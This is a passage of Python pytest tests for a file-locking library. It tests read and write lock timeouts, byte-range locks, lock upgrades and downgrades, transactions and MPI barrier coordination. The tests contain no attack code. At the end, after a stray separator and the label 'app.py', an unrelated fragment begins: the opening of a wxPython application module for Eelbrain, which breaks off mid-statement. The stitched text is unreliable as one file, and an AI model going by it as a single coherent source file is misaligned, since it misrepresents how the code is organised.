@pytest.fixture(scope='session', params=locations)
def lock_test_directory(request):
"""This fixture causes tests to be executed for many different mounts.
See the ``locations`` dict above for details.
"""
return request.param
@pytest.fixture(scope='session')
def lock_dir(lock_test_directory):
parent = next((p for p in glob.glob(lock_test_directory)
if os.path.exists(p) and os.access(p, os.W_OK)), None)
if not parent:
# Skip filesystems that don't exist or aren't writable
pytest.skip("requires filesystem: '%s'" % lock_test_directory)
elif mpi and parent == tempfile.gettempdir():
# Skip local tmp test for MPI runs
pytest.skip("skipping local tmp directory for MPI test.")
tempdir = None
if not mpi or comm.rank == 0:
tempdir = tempfile.mkdtemp(dir=parent)
if mpi:
tempdir = comm.bcast(tempdir)
yield tempdir
if mpi:
# rank 0 may get here before others, in which case it'll try to
# remove the directory while other processes try to re-create the
# lock. This will give errno 39: directory not empty. Use a
# barrier to ensure everyone is done first.
comm.barrier()
if not mpi or comm.rank == 0:
make_writable(tempdir)
shutil.rmtree(tempdir)
@pytest.fixture
def private_lock_path(lock_dir):
"""In MPI mode, this is a private lock for each rank in a multiproc test.
For other modes, it is the same as a shared lock.
"""
lock_file = os.path.join(lock_dir, 'lockfile')
if mpi:
lock_file += '.%s' % comm.rank
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
@pytest.fixture
def lock_path(lock_dir):
"""This lock is shared among all processes in a multiproc test."""
lock_file = os.path.join(lock_dir, 'lockfile')
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
def test_poll_interval_generator():
interval_iter = iter(
lk.Lock._poll_interval_generator(_wait_times=[1, 2, 3]))
intervals = list(next(interval_iter) for i in range(100))
assert intervals == [1] * 20 + [2] * 40 + [3] * 40
def local_multiproc_test(*functions, **kwargs):
"""Order some processes using simple barrier synchronization."""
b = mp.Barrier(len(functions), timeout=barrier_timeout)
args = (b,) + tuple(kwargs.get('extra_args', ()))
procs = [Process(target=f, args=args, name=f.__name__)
for f in functions]
for p in procs:
p.start()
for p in procs:
p.join()
assert all(p.exitcode == 0 for p in procs)
def mpi_multiproc_test(*functions):
"""SPMD version of multiproc test.
This needs to be run like so:
srun spack test lock
Each process executes its corresponding function. This is different
from ``multiproc_test`` above, which spawns the processes. This will
skip tests if there are too few processes to run them.
"""
procs = len(functions)
if procs > comm.size:
pytest.skip("requires at least %d MPI processes" % procs)
comm.Barrier() # barrier before each MPI test
include = comm.rank < len(functions)
subcomm = comm.Split(include)
class subcomm_barrier(object):
"""Stand-in for multiproc barrier for MPI-parallel jobs."""
def wait(self):
subcomm.Barrier()
if include:
try:
functions[subcomm.rank](subcomm_barrier())
except BaseException:
# aborting is the best we can do for MPI tests without
# hanging, since we're using MPI barriers. This will fail
# early and it loses the nice pytest output, but at least it
# gets use a stacktrace on the processes that failed.
traceback.print_exc()
comm.Abort()
subcomm.Free()
comm.Barrier() # barrier after each MPI test.
"""``multiproc_test()`` should be called by tests below.
``multiproc_test()`` will work for either MPI runs or for local runs.
"""
multiproc_test = mpi_multiproc_test if mpi else local_multiproc_test
#
# Process snippets below can be composed into tests.
#
class AcquireWrite(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
lock.acquire_write() # grab exclusive lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
class AcquireRead(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
lock.acquire_read() # grab shared lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
class TimeoutWrite(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
barrier.wait()
class TimeoutRead(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait()
#
# Test that exclusive locks on other processes time out when an
# exclusive lock is held.
#
def test_write_lock_timeout_on_write(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_2(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_3(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_ranges(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 0, 1))
def test_write_lock_timeout_on_write_ranges_2(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 64),
AcquireWrite(lock_path, 65, 1),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 63, 1))
def test_write_lock_timeout_on_write_ranges_3(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 1, 1),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_ranges_4(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 1, 1),
AcquireWrite(lock_path, 2, 456),
AcquireWrite(lock_path, 500, 64),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
#
# Test that shared locks on other processes time out when an
# exclusive lock is held.
#
def test_read_lock_timeout_on_write(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_2(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_3(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_ranges(lock_path):
"""small write lock, read whole file."""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_ranges_2(lock_path):
"""small write lock, small read lock"""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutRead(lock_path, 0, 1))
def test_read_lock_timeout_on_write_ranges_3(lock_path):
"""two write locks, overlapping read locks"""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 64, 128),
TimeoutRead(lock_path, 0, 1),
TimeoutRead(lock_path, 128, 256))
#
# Test that exclusive locks time out when shared locks are held.
#
def test_write_lock_timeout_on_read(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_3(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_ranges_2(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
TimeoutWrite(lock_path, 0, 1))
def test_write_lock_timeout_on_read_ranges_3(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
AcquireRead(lock_path, 10, 1),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 10, 1))
def test_write_lock_timeout_on_read_ranges_4(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 64),
TimeoutWrite(lock_path, 10, 1),
TimeoutWrite(lock_path, 32, 1))
def test_write_lock_timeout_on_read_ranges_5(lock_path):
multiproc_test(
AcquireRead(lock_path, 64, 128),
TimeoutWrite(lock_path, 65, 1),
TimeoutWrite(lock_path, 127, 1),
TimeoutWrite(lock_path, 90, 10))
#
# Test that exclusive locks time while lots of shared locks are held.
#
def test_write_lock_timeout_with_multiple_readers_2_1(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_1(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_1_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 10),
AcquireRead(lock_path, 0.5, 10),
TimeoutWrite(lock_path, 5, 5))
def test_write_lock_timeout_with_multiple_readers_2_3_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 10),
AcquireRead(lock_path, 5, 15),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 11, 3),
TimeoutWrite(lock_path, 7, 1))
def test_write_lock_timeout_with_multiple_readers_3_1_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 5),
AcquireRead(lock_path, 5, 5),
AcquireRead(lock_path, 10, 5),
TimeoutWrite(lock_path, 0, 15))
def test_write_lock_timeout_with_multiple_readers_3_2_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 5),
AcquireRead(lock_path, 5, 5),
AcquireRead(lock_path, 10, 5),
TimeoutWrite(lock_path, 3, 10),
TimeoutWrite(lock_path, 5, 1))
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_on_read_only_lockfile(lock_dir, lock_path):
"""read-only directory, read-only lockfile."""
touch(lock_path)
with read_only(lock_path, lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.LockROFileError):
with lk.WriteTransaction(lock):
pass
def test_read_lock_read_only_dir_writable_lockfile(lock_dir, lock_path):
"""read-only directory, writable lockfile."""
touch(lock_path)
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_no_lockfile(lock_dir, lock_path):
"""read-only directory, no lockfile (so can't create)."""
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with pytest.raises(lk.CantCreateLockError):
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.CantCreateLockError):
with lk.WriteTransaction(lock):
pass
def test_upgrade_read_to_write(private_lock_path):
"""Test that a read lock can be upgraded to a write lock.
Note that to upgrade a read lock to a write lock, you have the be the
only holder of a read lock. Client code needs to coordinate that for
shared locks. For this test, we use a private lock just to test that an
upgrade is possible.
"""
# ensure lock file exists the first time, so we open it read-only
# to begin wtih.
touch(private_lock_path)
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.acquire_write()
assert lock._reads == 1
assert lock._writes == 1
assert lock._file.mode == 'r+'
lock.release_write()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r+'
lock.release_read()
assert lock._reads == 0
assert lock._writes == 0
assert lock._file is None
def test_upgrade_read_to_write_fails_with_readonly_file(private_lock_path):
"""Test that read-only file can be read-locked but not write-locked."""
# ensure lock file exists the first time
touch(private_lock_path)
# open it read-only to begin wtih.
with read_only(private_lock_path):
lock = lk.Lock(private_lock_path)
assert lock._reads == 0
assert lock._writes == 0
lock.acquire_read()
assert lock._reads == 1
assert lock._writes == 0
assert lock._file.mode == 'r'
# upgrade to writ here
with pytest.raises(lk.LockROFileError):
lock.acquire_write()
class ComplexAcquireAndRelease(object):
def __init__(self, lock_path):
self.lock_path = lock_path
def p1(self, barrier):
lock = lk.Lock(self.lock_path)
lock.acquire_write()
barrier.wait() # ---------------------------------------- 1
# others test timeout
barrier.wait() # ---------------------------------------- 2
lock.release_write() # release and others acquire read
barrier.wait() # ---------------------------------------- 3
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
lock.acquire_read()
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write and read
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p2(self, barrier):
lock = lk.Lock(self.lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
# others release reads
barrier.wait() # ---------------------------------------- 5
lock.acquire_write() # upgrade read to write
barrier.wait() # ---------------------------------------- 6
# others test timeout
barrier.wait() # ---------------------------------------- 7
lock.release_write() # release read AND write (need both)
lock.release_read()
barrier.wait() # ---------------------------------------- 8
# p3 acquires read
barrier.wait() # ---------------------------------------- 9
# p3 upgrades read to write
barrier.wait() # ---------------------------------------- 10
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 11
# p3 releases locks
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
def p3(self, barrier):
lock = lk.Lock(self.lock_path)
# p1 acquires write
barrier.wait() # ---------------------------------------- 1
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 2
lock.acquire_read()
barrier.wait() # ---------------------------------------- 3
# p1 tests shared read
barrier.wait() # ---------------------------------------- 4
lock.release_read()
barrier.wait() # ---------------------------------------- 5
# p2 upgrades read to write
barrier.wait() # ---------------------------------------- 6
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait() # ---------------------------------------- 7
# p2 releases write & read
barrier.wait() # ---------------------------------------- 8
lock.acquire_read()
barrier.wait() # ---------------------------------------- 9
lock.acquire_write()
barrier.wait() # ---------------------------------------- 10
# others test timeout
barrier.wait() # ---------------------------------------- 11
lock.release_read() # release read AND write in opposite
lock.release_write() # order from before on p2
barrier.wait() # ---------------------------------------- 12
lock.acquire_read()
barrier.wait() # ---------------------------------------- 13
lock.release_read()
#
# Longer test case that ensures locks are reusable. Ordering is
# enforced by barriers throughout -- steps are shown with numbers.
#
def test_complex_acquire_and_release_chain(lock_path):
test_chain = ComplexAcquireAndRelease(lock_path)
multiproc_test(test_chain.p1,
test_chain.p2,
test_chain.p3)
class AssertLock(lk.Lock):
"""Test lock class that marks acquire/release events."""
def __init__(self, lock_path, vals):
super(AssertLock, self).__init__(lock_path)
self.vals = vals
# assert hooks for subclasses
assert_acquire_read = lambda self: None
assert_acquire_write = lambda self: None
assert_release_read = lambda self: None
assert_release_write = lambda self: None
def acquire_read(self, timeout=None):
self.assert_acquire_read()
result = super(AssertLock, self).acquire_read(timeout)
self.vals['acquired_read'] = True
return result
def acquire_write(self, timeout=None):
self.assert_acquire_write()
result = super(AssertLock, self).acquire_write(timeout)
self.vals['acquired_write'] = True
return result
def release_read(self, release_fn=None):
self.assert_release_read()
result = super(AssertLock, self).release_read(release_fn)
self.vals['released_read'] = True
return result
def release_write(self, release_fn=None):
self.assert_release_write()
result = super(AssertLock, self).release_write(release_fn)
self.vals['released_write'] = True
return result
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
# assert enter_fn is called while lock is held
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
# assert exit_fn is called while lock is held
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=enter_fn, release=exit_fn):
assert vals['acquired_%s' % type]
assert not vals['released_%s' % type]
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['acquired_%s' % type]
assert vals['released_%s' % type]
assert not vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_exception(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_read(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def assert_acquire_write(self):
assert not vals['entered_fn']
assert not vals['exited_fn']
def assert_release_write(self):
assert vals['entered_fn']
assert not vals['exited_fn']
def enter_fn():
assert vals['acquired_%s' % type]
vals['entered_fn'] = True
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception'] = (t or v or tb)
return exit_result
exit_result = False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with pytest.raises(Exception):
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
# test suppression of exceptions from exit_fn
exit_result = True
vals.clear()
# should not raise now.
with transaction(lock, acquire=enter_fn, release=exit_fn):
raise Exception()
assert vals['entered_fn']
assert vals['exited_fn']
assert vals['exception']
@pytest.mark.parametrize(
"transaction,type",
[(lk.ReadTransaction, "read"), (lk.WriteTransaction, "write")]
)
def test_transaction_with_context_manager(lock_path, transaction, type):
class MockLock(AssertLock):
def assert_acquire_read(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_read(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
def assert_acquire_write(self):
assert not vals['entered_ctx']
assert not vals['exited_ctx']
def assert_release_write(self):
assert vals['entered_ctx']
assert vals['exited_ctx']
class TestContextManager(object):
def __enter__(self):
vals['entered_ctx'] = True
def __exit__(self, t, v, tb):
assert not vals['released_%s' % type]
vals['exited_ctx'] = True
vals['exception_ctx'] = (t or v or tb)
return exit_ctx_result
def exit_fn(t, v, tb):
assert not vals['released_%s' % type]
vals['exited_fn'] = True
vals['exception_fn'] = (t or v or tb)
return exit_fn_result
exit_fn_result, exit_ctx_result = False, False
vals = collections.defaultdict(lambda: False)
lock = MockLock(lock_path, vals)
with transaction(lock, acquire=TestContextManager, release=exit_fn):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
vals.clear()
with transaction(lock, acquire=TestContextManager):
pass
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert not vals['exception_ctx']
assert not vals['exception_fn']
# below are tests for exceptions with and without suppression
def assert_ctx_and_fn_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
else:
with transaction(
lock, acquire=TestContextManager, release=exit_fn):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert vals['exited_fn']
assert vals['exception_ctx']
assert vals['exception_fn']
def assert_only_ctx_exception(raises=True):
vals.clear()
if raises:
with pytest.raises(Exception):
with transaction(lock, acquire=TestContextManager):
raise Exception()
else:
with transaction(lock, acquire=TestContextManager):
raise Exception()
assert vals['entered_ctx']
assert vals['exited_ctx']
assert not vals['exited_fn']
assert vals['exception_ctx']
assert not vals['exception_fn']
# no suppression
assert_ctx_and_fn_exception(raises=True)
assert_only_ctx_exception(raises=True)
# suppress exception only in function
exit_fn_result, exit_ctx_result = True, False
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=True)
# suppress exception only in context
exit_fn_result, exit_ctx_result = False, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
# suppress exception in function and context
exit_fn_result, exit_ctx_result = True, True
assert_ctx_and_fn_exception(raises=False)
assert_only_ctx_exception(raises=False)
def test_nested_write_transaction(lock_path):
"""Ensure that the outermost write transaction writes."""
def write(t, v, tb):
vals['wrote'] = True
vals = collections.defaultdict(lambda: False)
lock = AssertLock(lock_path, vals)
# write/write
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write
vals.clear()
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert vals['wrote']
# write/read/write
vals.clear()
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
# read/write/read/write
vals.clear()
with lk.ReadTransaction(lock):
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
with lk.ReadTransaction(lock):
assert not vals['wrote']
with lk.WriteTransaction(lock, release=write):
assert not vals['wrote']
assert not vals['wrote']
assert not vals['wrote']
assert vals['wrote']
def test_nested_reads(lock_path):
"""Ensure that write transactions won't re-read data."""
def read():
vals['read'] += 1
vals = collections.defaultdict(lambda: 0)
lock = AssertLock(lock_path, vals)
# read/read
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# write/read/write
vals.clear()
assert vals['read'] == 0
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
# read/write/read/write
vals.clear()
assert vals['read'] == 0
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.ReadTransaction(lock, acquire=read):
assert vals['read'] == 1
with lk.WriteTransaction(lock, acquire=read):
assert vals['read'] == 1
class LockDebugOutput(object):
def __init__(self, lock_path):
self.lock_path = lock_path
self.host = socket.gethostname()
def p1(self, barrier, q1, q2):
# exchange pids
p1_pid = os.getpid()
q1.put(p1_pid)
p2_pid = q2.get()
# set up lock
lock = lk.Lock(self.lock_path, debug=True)
with lk.WriteTransaction(lock):
# p1 takes write lock and writes pid/host to file
barrier.wait() # ------------------------------------ 1
assert lock.pid == p1_pid
assert lock.host == self.host
# wait for p2 to verify contents of file
barrier.wait() # ---------------------------------------- 2
# wait for p2 to take a write lock
barrier.wait() # ---------------------------------------- 3
# verify pid/host info again
with lk.ReadTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == self.host
assert lock.pid == p2_pid
assert lock.host == self.host
barrier.wait() # ---------------------------------------- 4
def p2(self, barrier, q1, q2):
# exchange pids
p2_pid = os.getpid()
p1_pid = q1.get()
q2.put(p2_pid)
# set up lock
lock = lk.Lock(self.lock_path, debug=True)
# p1 takes write lock and writes pid/host to file
barrier.wait() # ---------------------------------------- 1
# verify that p1 wrote information to lock file
with lk.ReadTransaction(lock):
assert lock.pid == p1_pid
assert lock.host == self.host
barrier.wait() # ---------------------------------------- 2
# take a write lock on the file and verify pid/host info
with lk.WriteTransaction(lock):
assert lock.old_pid == p1_pid
assert lock.old_host == self.host
assert lock.pid == p2_pid
assert lock.host == self.host
barrier.wait() # ------------------------------------ 3
# wait for p1 to verify pid/host info
barrier.wait() # ---------------------------------------- 4
def test_lock_debug_output(lock_path):
test_debug = LockDebugOutput(lock_path)
q1, q2 = Queue(), Queue()
local_multiproc_test(test_debug.p2, test_debug.p1, extra_args=(q1, q2))
def test_lock_with_no_parent_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
lock = lk.Lock('foo/bar/baz/lockfile')
with lk.WriteTransaction(lock):
pass
def test_lock_in_current_directory(tmpdir):
"""Make sure locks work even when their parent directory does not exist."""
with tmpdir.as_cwd():
# test we can create a lock in the current directory
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
# and that we can do the same thing after it's already there
lock = lk.Lock('lockfile')
for i in range(10):
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
def test_attempts_str():
assert lk._attempts_str(0, 0) == ''
assert lk._attempts_str(0.12, 1) == ''
assert lk._attempts_str(12.345, 2) == ' after 12.35s and 2 attempts'
def test_lock_str():
lock = lk.Lock('lockfile')
lockstr = str(lock)
assert 'lockfile[0:0]' in lockstr
assert 'timeout=None' in lockstr
assert '#reads=0, #writes=0' in lockstr
def test_downgrade_write_okay(tmpdir):
"""Test the lock write-to-read downgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_write()
lock.downgrade_write_to_read()
assert lock._reads == 1
assert lock._writes == 0
def test_downgrade_write_fails(tmpdir):
"""Test failing the lock write-to-read downgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_read()
msg = 'Cannot downgrade lock from write to read on file: lockfile'
with pytest.raises(lk.LockDowngradeError, match=msg):
lock.downgrade_write_to_read()
@pytest.mark.parametrize("err_num,err_msg",
[(errno.EACCES, "Fake EACCES error"),
(errno.EAGAIN, "Fake EAGAIN error"),
(errno.ENOENT, "Fake ENOENT error")])
def test_poll_lock_exception(tmpdir, monkeypatch, err_num, err_msg):
"""Test poll lock exception handling."""
def _lockf(fd, cmd, len, start, whence):
raise IOError(err_num, err_msg)
with tmpdir.as_cwd():
lockfile = 'lockfile'
lock = lk.Lock(lockfile)
touch(lockfile)
monkeypatch.setattr(fcntl, 'lockf', _lockf)
if err_num in [errno.EAGAIN, errno.EACCES]:
assert not lock._poll_lock(fcntl.LOCK_EX)
else:
with pytest.raises(IOError, match=err_msg):
lock._poll_lock(fcntl.LOCK_EX)
def test_upgrade_read_okay(tmpdir):
"""Test the lock read-to-write upgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_read()
lock.upgrade_read_to_write()
assert lock._reads == 0
assert lock._writes == 1
def test_upgrade_read_fails(tmpdir):
"""Test failing the lock read-to-write upgrade operation."""
with tmpdir.as_cwd():
lock = lk.Lock('lockfile')
lock.acquire_write()
msg = 'Cannot upgrade lock from read to write on file: lockfile'
with pytest.raises(lk.LockUpgradeError, match=msg):
lock.upgrade_read_to_write()
|
app.py | from distutils.version import LooseVersion
from logging import getLogger
import select
import sys
from threading import Thread
from time import sleep
import webbrowser
import wx
from wx.adv import TaskBarIcon, TBI_DOCK
from .._utils import IS_OSX, IS_WINDOWS
from ..plot._base import CONFIG
from .about import AboutFrame
from .frame import FOCUS_UI_UPDATE_FUNC_NAMES, EelbrainFrame
from .utils import Icon
from . import ID
APP = None # hold the App instance
JUMPSTART_TIME = 250 # ms
def wildcard(filetypes):
if filetypes:
return '|'.join(map('|'.join, filetypes))
else:
return ""
class App(wx.App):
_pt_thread = None
about_frame = None
_result = None
_bash_ui_from_mainloop = None
_ipython = None
using_prompt_toolkit = False
def OnInit(self):
self.SetAppName("Eelbrain")
self.SetAppDisplayName("Eelbrain")
# register in IPython
if CONFIG['prompt_toolkit'] and 'IPython' in sys.modules and LooseVersion(sys.modules['IPython'].__version__) >= LooseVersion('5'):
